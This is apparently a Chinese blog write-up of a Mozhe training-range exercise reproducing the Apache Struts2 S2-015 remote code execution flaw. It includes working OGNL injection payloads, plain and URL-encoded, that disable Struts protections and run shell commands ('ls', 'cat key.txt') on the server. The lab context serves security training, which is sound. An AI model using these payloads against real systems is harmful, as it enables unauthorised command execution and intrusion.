08#墨者靶场-Apache Struts2远程代码执行漏洞(S2-015)复现

其他 2020-03-19 17:33:46 阅读次数: 0

墨者学习

By/shy014

背景介绍

某日，安全工程师"墨者"对一单位业务系统进行授权扫描，在扫描过程中，发现了某个业务系统使用Apache Struts2框架。并且该版本存在高危漏洞，不知道运维人员是否修补了漏洞。

实训目标

1、了解Apache Struts2框架；

2、了解Apache Struts2远程代码执行漏洞(S2-015)；

3、了解Apache Struts2远程代码执行漏洞形成原理；

4、掌握Apache Struts2远程代码执行漏洞利用方法；

解题方向

验证Apache Struts2远程代码执行漏洞(S2-015)。

由于通配符匹配机制引入的漏洞或OGNL表达式的双重评估允许远程命令执行。

在墨者学院找到该靶场并点击启动靶场

点击访问，进入靶场环境，输入/${1+1}.action。发现表达式被执行，证明存在漏洞。

查看文件

Payload：${#context[‘xwork.MethodAccessor.denyMethodExecution’]=false,#m=#_memberAccess.getClass().getDeclaredField(‘allowStaticMethodAccess’),#m.setAccessible(true),#m.set(#_memberAccess,true),#[email protected]@toString(@java.lang.Runtime@getRuntime().exec(‘ls’).getInputStream()),#q}.action

需要经过url编码：

/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27ls%27%29.getInputStream%28%29%29%2C%23q%7D.action

4.执行cat key.txt，获取key

Payload：/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27cat%20key.txt%27%29.getInputStream%28%29%29%2C%23q%7D.action

二．使用struts2漏洞检测工具

1.使用工具进行检测，发现存在漏洞

2.执行ls命令

读取key.txt值

提交key

shy014

发布了41 篇原创文章 · 获赞 5 · 访问量 1万+

私信关注

猜你喜欢

转载自blog.csdn.net/qq_32393893/article/details/103240090

08#墨者靶场-Apache Struts2远程代码执行漏洞(S2-015)复现

Apache Struts2远程代码执行漏洞(S2-015)

09#墨者靶场-Apache Struts2远程代码执行漏洞(S2-016)复现

墨者学院13 Apache Struts2远程代码执行漏洞(S2-016)复现

Apache Struts2远程代码执行漏洞(S2-001)复现

墨者-(RCE)Apache Struts2远程代码执行漏洞(S2-032）

关于Apache Struts2存在S2-045远程代码执行漏洞

Apache struts2 Freemarker标签远程命令执行_CVE-2017-12611(S2-053)漏洞复现

Apache struts2 namespace远程命令执行_CVE-2018-11776(S2-057)漏洞复现

appscan漏洞--Apache Struts2 远程代码执行

S2-015 远程代码执行漏洞

9.漏洞验证系列--Apache Struts2 远程命令执行(S2-045)

Apache Struts 2 远程代码执行漏洞

Apache Struts2 存在远程代码执行漏洞（CVE-2020-17530）

CVE-2021-31805|Apache Struts2远程代码执行漏洞预警

从0到1学习网络安全【实战篇-Apache Struts2（S2-052）远程代码执行漏洞利用及修复】...

墨者靶场初级：WordPress 远程命令执行漏洞（CVE-2018-15877）复现

【漏洞复现】Apache Struts2 CVE-2023-50164

Struts2 S2-048远程代码执行漏洞复现

Struts2远程代码执行漏洞复现

struts2 057 OGNL的远程代码执行漏洞复现

Struts2 S2-061 远程命令执行漏洞（CVE-2020-17530）复现

墨者靶场初级：X-Forwarded-For注入漏洞实战

墨者靶场初级：BeesCMS系统漏洞分析溯源

墨者学院在线靶场之业务逻辑漏洞实战

墨者靶场----SQL注入漏洞测试(时间盲注)

墨者靶场------SQL注入漏洞测试(报错盲注)

墨者靶场-X-Forwarded-For注入漏洞实战

墨者靶场 WordPress插件漏洞分析溯源

SQL注入漏洞测试(参数加密)&墨者靶场

今日推荐

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

国产云输入法——仅华为无云端数据上传安全问题

开源日报 | 工业开源项目OGG 1.0；姐姐，你要和我一起配置火狐吗；苹果AI遥遥落后？Fedora 40

开放签电子签章：停止新增，优化体验，前进更进（五一假期前工作）

开源日报 | 中学生开源前端动画引擎；全球首个Llama3 8B中文版开源模型；联想电脑恐出局；Linus讽刺AI炒作

周排行

浏览器对同一域名进行请求的最大并发连接数

React Hook之自定义Hook

【转】MyBatis缓存机制

-Java-泛型

自动化测试常用脚本-发送邮件

LeetCode#859: Buddy Strings

java、Python处理字符串

第二篇の博客

Hadoop伪分布式环境安装

SQL Server进阶（十一）临时表、表变量

每日归档

更多

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)

2024-04-20(6)

2024-04-19(5)

2024-04-18(0)